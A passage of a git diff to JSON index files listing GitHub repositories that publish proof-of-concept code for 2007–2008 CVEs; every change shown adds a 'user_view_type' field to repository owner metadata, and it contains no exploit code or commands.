"https:\/\/github.com\/WildfootW\/CVE-2007-2447_Samba_3.0.25rc3", "description": null, @@ -217,7 +224,8 @@ "login": "Ziemni", "id": 22441278, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22441278?v=4", - "html_url": "https:\/\/github.com\/Ziemni" + "html_url": "https:\/\/github.com\/Ziemni", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Ziemni\/CVE-2007-2447-in-Python", "description": "Python implementation of 'Username' map script' RCE Exploit for Samba 3.0.20 < 3.0.25rc3 (CVE-2007-2447).", @@ -247,7 +255,8 @@ "login": "0xKn", "id": 80174242, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80174242?v=4", - "html_url": "https:\/\/github.com\/0xKn" + "html_url": "https:\/\/github.com\/0xKn", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0xKn\/CVE-2007-2447", "description": null, @@ -277,7 +286,8 @@ "login": "ozuma", "id": 1208361, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1208361?v=4", - "html_url": "https:\/\/github.com\/ozuma" + "html_url": "https:\/\/github.com\/ozuma", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ozuma\/CVE-2007-2447", "description": "Exploit Samba", @@ -307,7 +317,8 @@ "login": "un4gi", "id": 47873286, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47873286?v=4", - "html_url": "https:\/\/github.com\/un4gi" + "html_url": "https:\/\/github.com\/un4gi", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/un4gi\/CVE-2007-2447", "description": "Samba 3.0.20 username map script exploit", @@ -337,7 +348,8 @@ "login": "G01d3nW01f", "id": 75846902, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75846902?v=4", - "html_url": "https:\/\/github.com\/G01d3nW01f" + "html_url": "https:\/\/github.com\/G01d3nW01f", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/G01d3nW01f\/CVE-2007-2447", "description": "cve-2007-2447 this script was rewrite the part of Metasploit modules to python3", @@ -367,7 +379,8 @@ "login": "cherrera0001", "id": 19656010, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19656010?v=4", - "html_url": "https:\/\/github.com\/cherrera0001" + "html_url": "https:\/\/github.com\/cherrera0001", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cherrera0001\/CVE-2007-2447", "description": " Samba usermap script.", @@ -397,7 +410,8 @@ "login": "Alien0ne", "id": 73351962, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73351962?v=4", - "html_url": "https:\/\/github.com\/Alien0ne" + "html_url": "https:\/\/github.com\/Alien0ne", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Alien0ne\/CVE-2007-2447", "description": "CVE-2007-2447 - Samba usermap script", @@ -427,7 +441,8 @@ "login": "3t4n", "id": 16639269, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16639269?v=4", - "html_url": "https:\/\/github.com\/3t4n" + "html_url": "https:\/\/github.com\/3t4n", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/3t4n\/samba-3.0.24-CVE-2007-2447-vunerable-", "description": null, @@ -457,7 +472,8 @@ "login": "xbufu", "id": 49696158, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49696158?v=4", - "html_url": "https:\/\/github.com\/xbufu" + "html_url": "https:\/\/github.com\/xbufu", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/xbufu\/CVE-2007-2447", "description": "Exploit code for CVE-2007-2447 written in Python3.", @@ -487,7 +503,8 @@ "login": "s4msec", "id": 75855533, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75855533?v=4", - "html_url": "https:\/\/github.com\/s4msec" + "html_url": "https:\/\/github.com\/s4msec", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/s4msec\/CVE-2007-2447", "description": null, @@ -517,7 +534,8 @@ "login": "0xConstant", "id": 51972282, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51972282?v=4", - "html_url": "https:\/\/github.com\/0xConstant" + "html_url": "https:\/\/github.com\/0xConstant", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0xConstant\/CVE-2007-2447", "description": null, @@ -547,7 +565,8 @@ "login": "Nosferatuvjr", "id": 67665267, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67665267?v=4", - "html_url": "https:\/\/github.com\/Nosferatuvjr" + "html_url": "https:\/\/github.com\/Nosferatuvjr", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Nosferatuvjr\/Samba-Usermap-exploit", "description": "CVE-2007-2447", @@ -577,7 +596,8 @@ "login": "testaross4", "id": 105503572, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105503572?v=4", - "html_url": "https:\/\/github.com\/testaross4" + "html_url": "https:\/\/github.com\/testaross4", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/testaross4\/CVE-2007-2447", "description": null, @@ -607,7 +627,8 @@ "login": "mr-l0n3lly", "id": 24935413, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24935413?v=4", - "html_url": "https:\/\/github.com\/mr-l0n3lly" + "html_url": "https:\/\/github.com\/mr-l0n3lly", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/mr-l0n3lly\/CVE-2007-2447", "description": "CVE-2007-2447 samba remote code execution", @@ -637,7 +658,8 @@ "login": "HerculesRD", "id": 73125772, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73125772?v=4", - "html_url": "https:\/\/github.com\/HerculesRD" + "html_url": "https:\/\/github.com\/HerculesRD", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/HerculesRD\/PyUsernameMapScriptRCE", "description": "CVE-2007-2447 exploit written in python to get reverse shell", @@ -667,7 +689,8 @@ "login": "Aviksaikat", "id": 31238298, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31238298?v=4", - "html_url": "https:\/\/github.com\/Aviksaikat" + "html_url": "https:\/\/github.com\/Aviksaikat", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Aviksaikat\/CVE-2007-2447", "description": "automated script for exploiting CVE-2007-2447", @@ -697,7 +720,8 @@ "login": "NyxByt3", "id": 66146701, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66146701?v=4", - "html_url": "https:\/\/github.com\/NyxByt3" + "html_url": "https:\/\/github.com\/NyxByt3", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/NyxByt3\/CVE-2007-2447", "description": "Exploit Samba smbd 3.0.20-Debian", @@ -727,7 +751,8 @@ "login": "bdunlap9", "id": 23561759, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23561759?v=4", - "html_url": "https:\/\/github.com\/bdunlap9" + "html_url": "https:\/\/github.com\/bdunlap9", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/bdunlap9\/CVE-2007-2447_python", "description": "Exploit i used in HTB", @@ -757,7 +782,8 @@ "login": "MikeRega7", "id": 114309996, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114309996?v=4", - "html_url": "https:\/\/github.com\/MikeRega7" + "html_url": "https:\/\/github.com\/MikeRega7", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/MikeRega7\/CVE-2007-2447-RCE", "description": "Samba 3.0.20", @@ -787,7 +813,8 @@ "login": "0xTabun", "id": 144548207, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144548207?v=4", - "html_url": "https:\/\/github.com\/0xTabun" + "html_url": "https:\/\/github.com\/0xTabun", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0xTabun\/CVE-2007-2447", "description": "Samba Reverse Shell", @@ -817,7 +844,8 @@ "login": "ShivamDey", "id": 87941867, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87941867?v=4", - "html_url": "https:\/\/github.com\/ShivamDey" + "html_url": "https:\/\/github.com\/ShivamDey", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ShivamDey\/Samba-CVE-2007-2447-Exploit", "description": null, @@ -847,7 +875,8 @@ "login": "Juantos", "id": 22524318, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22524318?v=4", - "html_url": "https:\/\/github.com\/Juantos" + "html_url": "https:\/\/github.com\/Juantos", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Juantos\/cve-2007-2447", "description": "Samba 3.0.0 - 3.0.25rc3", @@ -877,7 +906,8 @@ "login": "IamLucif3r", "id": 53969258, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53969258?v=4", - "html_url": "https:\/\/github.com\/IamLucif3r" + "html_url": "https:\/\/github.com\/IamLucif3r", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/IamLucif3r\/CVE-2007-2447-Exploit", "description": "This is a exploit for CVE-2007-2447; Vulnerable SMB ", diff --git a/2007/CVE-2007-3280.json b/2007/CVE-2007-3280.json index b46fdc0756..8674585826 100644 --- a/2007/CVE-2007-3280.json +++ b/2007/CVE-2007-3280.json @@ -7,7 +7,8 @@ "login": "DenuwanJayasekara", "id": 181200406, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/181200406?v=4", - "html_url": "https:\/\/github.com\/DenuwanJayasekara" + "html_url": "https:\/\/github.com\/DenuwanJayasekara", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/DenuwanJayasekara\/CVE-Exploitation-Reports", "description": "CVE Exploitation Reports: CVE-2007-3280, CVE-2017-0144, CVE-2019-0708", diff --git a/2007/CVE-2007-3830.json b/2007/CVE-2007-3830.json index f5afbfbd41..4623a868e4 100644 --- a/2007/CVE-2007-3830.json +++ b/2007/CVE-2007-3830.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2007-3830", "description": "IBM Proventia Sensor Appliance - Multiple Input Validation Vulnerabilities", diff --git a/2007/CVE-2007-3831.json b/2007/CVE-2007-3831.json index 2373bb589c..38eadd24d4 100644 --- a/2007/CVE-2007-3831.json +++ b/2007/CVE-2007-3831.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2007-3831", "description": "PHP remote file inclusion in main.php in ISS Proventia Network IPS GX5108 1.3 and GX5008 1.5 ", diff --git a/2007/CVE-2007-4559.json b/2007/CVE-2007-4559.json index 037135bf18..89f822efbb 100644 --- a/2007/CVE-2007-4559.json +++ b/2007/CVE-2007-4559.json @@ -7,7 +7,8 @@ "login": "advanced-threat-research", "id": 27901279, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27901279?v=4", - "html_url": "https:\/\/github.com\/advanced-threat-research" + "html_url": "https:\/\/github.com\/advanced-threat-research", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/advanced-threat-research\/Creosote", "description": "Creosote is our solution to searching for the tarfile vulnerability described by CVE-2007-4559.", @@ -37,7 +38,8 @@ "login": "Ooscaar", "id": 60936394, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60936394?v=4", - "html_url": "https:\/\/github.com\/Ooscaar" + "html_url": "https:\/\/github.com\/Ooscaar", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Ooscaar\/MALW", "description": "CVE-2007-4559 - Polemarch exploit", @@ -67,7 +69,8 @@ "login": "davidholiday", "id": 7077306, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7077306?v=4", - "html_url": "https:\/\/github.com\/davidholiday" + "html_url": "https:\/\/github.com\/davidholiday", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/davidholiday\/CVE-2007-4559", "description": null, @@ -97,7 +100,8 @@ "login": "luigigubello", "id": 27034386, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27034386?v=4", - "html_url": "https:\/\/github.com\/luigigubello" + "html_url": "https:\/\/github.com\/luigigubello", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/luigigubello\/trellix-tarslip-patch-bypass", "description": "Bypass for CVE-2007-4559 Trellix patch", @@ -127,7 +131,8 @@ "login": "JamesDarf", "id": 96758146, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96758146?v=4", - "html_url": "https:\/\/github.com\/JamesDarf" + "html_url": "https:\/\/github.com\/JamesDarf", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/JamesDarf\/tarpioka", "description": "YISF 2024 CTF-Web (Directory Traversal via \".tar\" file, CVE-2007-4559), easy", diff --git a/2007/CVE-2007-4560.json b/2007/CVE-2007-4560.json index be4693c557..b6e5ae282f 100644 --- a/2007/CVE-2007-4560.json +++ b/2007/CVE-2007-4560.json @@ -7,7 +7,8 @@ "login": "0x1sac", "id": 121731764, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121731764?v=4", - "html_url": "https:\/\/github.com\/0x1sac" + "html_url": "https:\/\/github.com\/0x1sac", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0x1sac\/ClamAV-Milter-Sendmail-0.91.2-Remote-Code-Execution", "description": "Exploit for CVE-2007-4560 (ClamAV Milter Sendmail 0.91.2 Remote Code Execution)", diff --git a/2007/CVE-2007-4607.json b/2007/CVE-2007-4607.json index 9620fc0128..d4235b57e4 100644 --- a/2007/CVE-2007-4607.json +++ b/2007/CVE-2007-4607.json @@ -7,7 +7,8 @@ "login": "joeyrideout", "id": 4960269, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4960269?v=4", - "html_url": "https:\/\/github.com\/joeyrideout" + "html_url": "https:\/\/github.com\/joeyrideout", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/joeyrideout\/CVE-2007-4607", "description": "Make CVE-2007-4607 exploitable again!", diff --git a/2007/CVE-2007-5036.json b/2007/CVE-2007-5036.json index 450c348fe0..f862e0de76 100644 --- a/2007/CVE-2007-5036.json +++ b/2007/CVE-2007-5036.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2007-5036", "description": "Airsensor M520 - HTTPd Unauthenticated Remote Denial of Service \/ Buffer Overflow (PoC)", diff --git a/2007/CVE-2007-5962.json b/2007/CVE-2007-5962.json index cc917f300e..b036b13b66 100644 --- a/2007/CVE-2007-5962.json +++ b/2007/CVE-2007-5962.json @@ -7,7 +7,8 @@ "login": "antogit-sys", "id": 64706936, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64706936?v=4", - "html_url": "https:\/\/github.com\/antogit-sys" + "html_url": "https:\/\/github.com\/antogit-sys", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/antogit-sys\/CVE-2007-5962", "description": "vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption", diff --git a/2007/CVE-2007-6377.json b/2007/CVE-2007-6377.json index 3a149e13ed..27ecd38914 100644 --- a/2007/CVE-2007-6377.json +++ b/2007/CVE-2007-6377.json @@ -7,7 +7,8 @@ "login": "Nicoslo", "id": 64541498, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64541498?v=4", - "html_url": "https:\/\/github.com\/Nicoslo" + "html_url": "https:\/\/github.com\/Nicoslo", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Nicoslo\/Windows-exploitation-BadBlue-2.7-CVE-2007-6377", "description": null, diff --git a/2007/CVE-2007-6638.json b/2007/CVE-2007-6638.json index e54d43c2c5..b8ae213ffa 100644 --- a/2007/CVE-2007-6638.json +++ b/2007/CVE-2007-6638.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2007-6638", "description": "March Networks DVR 3204 - Logfile Information Disclosure", diff --git a/2008/CVE-2008-0128.json b/2008/CVE-2008-0128.json index 94e83cffe5..6659db7bb3 100644 --- a/2008/CVE-2008-0128.json +++ b/2008/CVE-2008-0128.json @@ -7,7 +7,8 @@ "login": "ngyanch", "id": 26293983, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26293983?v=4", - "html_url": "https:\/\/github.com\/ngyanch" + "html_url": "https:\/\/github.com\/ngyanch", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ngyanch\/4062-1", "description": "CVE-2008-0128", diff --git a/2008/CVE-2008-0166.json b/2008/CVE-2008-0166.json index 2473320e56..76a0b6cb22 100644 --- a/2008/CVE-2008-0166.json +++ b/2008/CVE-2008-0166.json @@ -7,7 +7,8 @@ "login": "g0tmi1k", "id": 535942, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/535942?v=4", - "html_url": "https:\/\/github.com\/g0tmi1k" + "html_url": "https:\/\/github.com\/g0tmi1k", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/g0tmi1k\/debian-ssh", "description": "Debian OpenSSL Predictable PRNG (CVE-2008-0166)", @@ -39,7 +40,8 @@ "login": "avarx", "id": 1161946, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1161946?v=4", - "html_url": "https:\/\/github.com\/avarx" + "html_url": "https:\/\/github.com\/avarx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/avarx\/vulnkeys", "description": "Debian OpenSSL Predictable PRNG (CVE-2008-0166)", @@ -69,7 +71,8 @@ "login": "badkeys", "id": 97682451, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97682451?v=4", - "html_url": "https:\/\/github.com\/badkeys" + "html_url": "https:\/\/github.com\/badkeys", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/badkeys\/debianopenssl", "description": "Private keys vulnerable to Debian OpenSSL bug (CVE-2008-0166)", @@ -99,7 +102,8 @@ "login": "demining", "id": 87700947, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87700947?v=4", - "html_url": "https:\/\/github.com\/demining" + "html_url": "https:\/\/github.com\/demining", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/demining\/Vulnerable-to-Debian-OpenSSL-bug-CVE-2008-0166", "description": "Search for BTC coins on earlier versions of Bitcoin Core with critical vulnerability OpenSSL 0.9.8 CVE-2008-0166", diff --git a/2008/CVE-2008-0228.json b/2008/CVE-2008-0228.json index a0d9b7b309..e6345f66cd 100644 --- a/2008/CVE-2008-0228.json +++ b/2008/CVE-2008-0228.json @@ -7,7 +7,8 @@ "login": "SpiderLabs", "id": 508521, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/508521?v=4", - "html_url": "https:\/\/github.com\/SpiderLabs" + "html_url": "https:\/\/github.com\/SpiderLabs", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/SpiderLabs\/TWSL2011-007_iOS_code_workaround", "description": "Workaround for the vulnerability identified by TWSL2011-007 or CVE-2008-0228 - iOS x509 Certificate Chain Validation Vulnerability", diff --git a/2008/CVE-2008-1611.json b/2008/CVE-2008-1611.json index 40b9b43c30..6774f2c800 100644 --- a/2008/CVE-2008-1611.json +++ b/2008/CVE-2008-1611.json @@ -7,7 +7,8 @@ "login": "Axua", "id": 28788087, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28788087?v=4", - "html_url": "https:\/\/github.com\/Axua" + "html_url": "https:\/\/github.com\/Axua", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Axua\/CVE-2008-1611", "description": "CVE-2008-1611 TFTP 1.41 buffer overflow exploit in the filepath", diff --git a/2008/CVE-2008-1613.json b/2008/CVE-2008-1613.json index 7447880333..ff14a9b822 100644 --- a/2008/CVE-2008-1613.json +++ b/2008/CVE-2008-1613.json @@ -7,7 +7,8 @@ "login": "SECFORCE", "id": 8157384, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8157384?v=4", - "html_url": "https:\/\/github.com\/SECFORCE" + "html_url": "https:\/\/github.com\/SECFORCE", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/SECFORCE\/CVE-2008-1613", "description": "RedDot CMS versions 7.5 Build 7.5.0.48 and below full database enumeration exploit that takes advantage of a remote SQL injection vulnerability in ioRD.asp.", diff --git a/2008/CVE-2008-2019.json b/2008/CVE-2008-2019.json index 33f4ffba0f..70d67f199e 100644 --- a/2008/CVE-2008-2019.json +++ b/2008/CVE-2008-2019.json @@ -7,7 +7,8 @@ "login": "TheRook", "id": 521783, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/521783?v=4", - "html_url": "https:\/\/github.com\/TheRook" + "html_url": "https:\/\/github.com\/TheRook", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/TheRook\/AudioCaptchaBypass-CVE-2008-2019", "description": null, diff --git a/2008/CVE-2008-2938.json b/2008/CVE-2008-2938.json index 97a24b371e..13c42139be 100644 --- a/2008/CVE-2008-2938.json +++ b/2008/CVE-2008-2938.json @@ -7,7 +7,8 @@ "login": "Naramsim", "id": 8996268, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8996268?v=4", - "html_url": "https:\/\/github.com\/Naramsim" + "html_url": "https:\/\/github.com\/Naramsim", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Naramsim\/Offensive", "description": "Reproducible exploits for: CVE-2016-1240 CVE-2008-2938 CVE-2014-2064 CVE-2014-1904", diff --git a/2008/CVE-2008-3531.json b/2008/CVE-2008-3531.json index 051ac838c1..c072bc3d8e 100644 --- a/2008/CVE-2008-3531.json +++ b/2008/CVE-2008-3531.json @@ -7,7 +7,8 @@ "login": "test-one9", "id": 175934231, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/175934231?v=4", - "html_url": "https:\/\/github.com\/test-one9" + "html_url": "https:\/\/github.com\/test-one9", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/test-one9\/ps4-11.50.github.io", "description": "ps4 cve-2008-3531", diff --git a/2008/CVE-2008-4109.json b/2008/CVE-2008-4109.json index 32ac3ee504..827e1b27db 100644 --- a/2008/CVE-2008-4109.json +++ b/2008/CVE-2008-4109.json @@ -7,7 +7,8 @@ "login": "bigb0x", "id": 13532434, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4", - "html_url": "https:\/\/github.com\/bigb0x" + "html_url": "https:\/\/github.com\/bigb0x", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-6387", "description": "Bulk Scanning Tool for OpenSSH CVE-2024-6387, CVE-2006-5051 , CVE-2008-4109 and others.", diff --git a/2008/CVE-2008-4250.json b/2008/CVE-2008-4250.json index b9451dd38e..136328aebf 100644 --- a/2008/CVE-2008-4250.json +++ b/2008/CVE-2008-4250.json @@ -7,7 +7,8 @@ "login": "thunderstrike9090", "id": 28643644, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28643644?v=4", - "html_url": "https:\/\/github.com\/thunderstrike9090" + "html_url": "https:\/\/github.com\/thunderstrike9090", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/thunderstrike9090\/Conflicker_analysis_scripts", "description": "Scripts to analyze conflicker worm which exploits famous netapi vulnerability (CVE-2008-4250) i.e MS08-067", diff --git a/2008/CVE-2008-4609.json b/2008/CVE-2008-4609.json index 1f587879b4..cdff4d23e1 100644 --- a/2008/CVE-2008-4609.json +++ b/2008/CVE-2008-4609.json @@ -7,7 +7,8 @@ "login": "mrclki", "id": 75611002, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75611002?v=4", - "html_url": "https:\/\/github.com\/mrclki" + "html_url": "https:\/\/github.com\/mrclki", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/mrclki\/sockstress", "description": "Sockstress (CVE-2008-4609) DDoS implementation written in Go", diff --git a/2008/CVE-2008-4654.json b/2008/CVE-2008-4654.json index 1ea33059c5..a7e732ebb0 100644 --- a/2008/CVE-2008-4654.json +++ b/2008/CVE-2008-4654.json @@ -7,7 +7,8 @@ "login": "bongbongco", "id": 3170006, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3170006?v=4", - "html_url": "https:\/\/github.com\/bongbongco" + "html_url": "https:\/\/github.com\/bongbongco", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/bongbongco\/CVE-2008-4654", "description": "VideoLAN VLC media player 0.9.4 Media Player ty.c buffer overflow", @@ -37,7 +38,8 @@ "login": "KernelErr", "id": 45716019, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45716019?v=4", - "html_url": "https:\/\/github.com\/KernelErr" + "html_url": "https:\/\/github.com\/KernelErr", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/KernelErr\/VLC-CVE-2008-4654-Exploit", "description": "An EXP could run on Windows x64 against CVE-2008-4654.", @@ -73,7 +75,8 @@ "login": "rnnsz", "id": 84464863, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84464863?v=4", - "html_url": "https:\/\/github.com\/rnnsz" + "html_url": "https:\/\/github.com\/rnnsz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/rnnsz\/CVE-2008-4654", "description": null, diff --git a/2008/CVE-2008-4687.json b/2008/CVE-2008-4687.json index f596f126ed..f0ded8a95f 100644 --- a/2008/CVE-2008-4687.json +++ b/2008/CVE-2008-4687.json @@ -7,7 +7,8 @@ "login": "nmurilo", "id": 22617810, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22617810?v=4", - "html_url": "https:\/\/github.com\/nmurilo" + "html_url": "https:\/\/github.com\/nmurilo", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/nmurilo\/CVE-2008-4687-exploit", "description": null, @@ -37,7 +38,8 @@ "login": "twisted007", "id": 76926949, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76926949?v=4", - "html_url": "https:\/\/github.com\/twisted007" + "html_url": "https:\/\/github.com\/twisted007", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/twisted007\/mantis_rce", "description": "Python script to obtain RCE on Mantis Bug Tracker prior to version 1.2.x Check CVE-2008-4687 for additional information", diff --git a/2008/CVE-2008-5416.json b/2008/CVE-2008-5416.json index 4d6312e8e8..1465a611aa 100644 --- a/2008/CVE-2008-5416.json +++ b/2008/CVE-2008-5416.json @@ -7,7 +7,8 @@ "login": "SECFORCE", "id": 8157384, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8157384?v=4", - "html_url": "https:\/\/github.com\/SECFORCE" + "html_url": "https:\/\/github.com\/SECFORCE", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/SECFORCE\/CVE-2008-5416", "description": "Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection", diff --git a/2008/CVE-2008-5862.json b/2008/CVE-2008-5862.json index 75828dd169..c760e8aa6b 100644 --- a/2008/CVE-2008-5862.json +++ b/2008/CVE-2008-5862.json @@ -7,7 +7,8 @@ "login": "K3ysTr0K3R", "id": 70909693, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", - "html_url": "https:\/\/github.com\/K3ysTr0K3R" + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2008-5862-EXPLOIT", "description": "A PoC exploit for CVE-2008-5862 - Directory traversal vulnerability in webcamXP 5.3.2.375 and 5.3.2.410", diff --git a/2008/CVE-2008-6806.json b/2008/CVE-2008-6806.json index cb0c885a07..3d95512154 100644 --- a/2008/CVE-2008-6806.json +++ b/2008/CVE-2008-6806.json @@ -7,7 +7,8 @@ "login": "threatcode", "id": 120432727, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/120432727?v=4", - "html_url": "https:\/\/github.com\/threatcode" + "html_url": "https:\/\/github.com\/threatcode", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/threatcode\/CVE-2008-6806", "description": null, diff --git a/2008/CVE-2008-6827.json b/2008/CVE-2008-6827.json index 2d0394ba95..c8091a0d8c 100644 --- a/2008/CVE-2008-6827.json +++ b/2008/CVE-2008-6827.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2008-6827", "description": "Symantec Altiris Client Service 6.8.378 - Local Privilege Escalation", diff --git a/2008/CVE-2008-6970.json b/2008/CVE-2008-6970.json index 2de9b841f6..e796ae4956 100644 --- a/2008/CVE-2008-6970.json +++ b/2008/CVE-2008-6970.json @@ -7,7 +7,8 @@ "login": "KyomaHooin", "id": 19186867, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19186867?v=4", - "html_url": "https:\/\/github.com\/KyomaHooin" + "html_url": "https:\/\/github.com\/KyomaHooin", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/KyomaHooin\/CVE-2008-6970", "description": "Blind SQL injection brute force.", diff --git a/2008/CVE-2008-7220.json b/2008/CVE-2008-7220.json index 8a059376a0..5520e6a4d0 100644 --- a/2008/CVE-2008-7220.json +++ b/2008/CVE-2008-7220.json @@ -7,7 +7,8 @@ 